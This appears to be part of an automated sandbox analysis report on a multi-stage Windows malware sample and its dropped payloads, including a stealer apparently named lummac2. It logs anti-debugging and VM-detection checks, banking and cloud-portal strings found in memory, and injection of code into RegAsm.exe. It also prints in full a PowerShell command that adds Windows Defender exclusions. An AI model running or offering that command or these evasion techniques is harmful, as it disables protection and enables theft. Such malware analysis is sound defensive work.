Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5436	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7236	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7316	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7476	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe TID: 7580	Thread sleep time: -31000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676	Thread sleep count: 8755 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664	Thread sleep count: 567 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876	Thread sleep count: 3552 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 348	Thread sleep count: 8932 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -589066s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484	Thread sleep count: 691 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -588941s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -588816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -588699s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -588587s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -588478s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\hsRju5CPK2.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009FD5E1 FindFirstFileExW,	5_2_009FD5E1
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_0010DAAD FindFirstFileExW,	9_2_0010DAAD
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BCDAAD FindFirstFileExW,	11_2_00BCDAAD

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 9_2_000D7CE0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

9_2_000D7CE0

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 589066
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 588941
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 588816
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 588699
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 588587
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 588478

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\Desktop\desktop.ini

Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: axplong.exe, axplong.exe, 00000003.00000002.2095723344.0000000000EE9000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: ama.exe, 00000004.00000002.2393678580.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655LR]q
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: axplong.exe, 00000002.00000002.4492544980.00000000013F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWoD
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegAsm.exe, 00000017.00000002.2259714119.00000000031D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\]q
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: axplong.exe, 00000002.00000002.4492544980.0000000001442000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CAC000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2330615443.0000019C9A62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2331747580.0000019C9FC52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4221015454.0000018F5B4D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: NewLatest.exe, 00000009.00000003.2176841375.00000000007F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{5M@
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: svchost.exe, 0000001D.00000003.2334554249.0000018F5C2C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAA4BAAABAAAAAQAAAAEAAADQjJ3fARXREYx6AMBPwpfrAQAAAEdRzT0bFcBAm9CDNHN2ogAAAAAAAgAAAAAAEGYAAAABAAAgAAAA7kycj7GjnnfAYj/RYc20AEQVZ5/xSvEsTmvnnw84o1QAAAAADoAAAAACAAAgAAAABYGZ78SlgA7iuafFCskxRjHelIol3HgBhwitaKHgTQcwAAAAwHubrrScR6IzFT/dvH2G4dE5gNf7EgngXPpIJDdPQkv7f0DEwm5DSh77vmcI56hbQAAAACOLFTYCgbPEYT0lKJ9HYeRNJLSB3lkVHlzp5CkGJIrdWKywafljaPgZyQ82jwY9y28uuHMnr72VLJbyMjIi2tM=</SessionKey><SessionKeyType>4</SessionKeyType><CreatedTime>2024-06-23T22:10:29</CreatedTime><ExpiredTime>2024-08-22T23:50:28</ExpiredTime></AuthInfo>
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: ama.exe, 00000004.00000002.2392159357.000000000097A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4492467158.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, taskweaker.exe, 00000024.00000002.2510866393.0000023181FB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegAsm.exe, 00000017.00000002.2259714119.00000000031D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: svchost.exe, 0000001D.00000002.4218163762.0000018F5B42B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWG
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: hsRju5CPK2.exe, 00000000.00000002.2055254246.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2095723344.0000000000EE9000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: ama.exe, 00000004.00000002.2393678580.0000000002C44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655

Source: C:\Users\user\Desktop\hsRju5CPK2.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\hsRju5CPK2.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\hsRju5CPK2.exe

Code function: 0_2_054102EF rdtsc

0_2_054102EF

Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe

Code function: 8_2_005E8B54 LdrInitializeThunk,

8_2_005E8B54

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe

Code function: 5_2_009EE453 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_009EE453

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 9_2_000FBEA9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

9_2_000FBEA9

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00D2643B mov eax, dword ptr fs:[00000030h]	2_2_00D2643B
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00D2A1A2 mov eax, dword ptr fs:[00000030h]	2_2_00D2A1A2
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009FC47B mov eax, dword ptr fs:[00000030h]	5_2_009FC47B
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009F49DA mov ecx, dword ptr fs:[00000030h]	5_2_009F49DA
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_0010A1A2 mov eax, dword ptr fs:[00000030h]	9_2_0010A1A2
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_0010643B mov eax, dword ptr fs:[00000030h]	9_2_0010643B
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BCA1A2 mov eax, dword ptr fs:[00000030h]	11_2_00BCA1A2
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BC643B mov eax, dword ptr fs:[00000030h]	11_2_00BC643B

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe

Code function: 5_2_00A00D2A GetProcessHeap,

5_2_00A00D2A

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009EE453 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_009EE453
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009EA55A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_009EA55A
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009EA6B6 SetUnhandledExceptionFilter,	5_2_009EA6B6
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009EA7F3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_009EA7F3
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000ED0ED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_000ED0ED
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_001069BE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_001069BE
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000EDAB5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000EDAB5
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000EDC1A SetUnhandledExceptionFilter,	9_2_000EDC1A
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BC69BE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00BC69BE
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BAD0ED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00BAD0ED
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BADAB5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00BADAB5
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BADC1A SetUnhandledExceptionFilter,	11_2_00BADC1A

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2D10000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe

Code function: 5_2_00BE018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

5_2_00BE018D

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
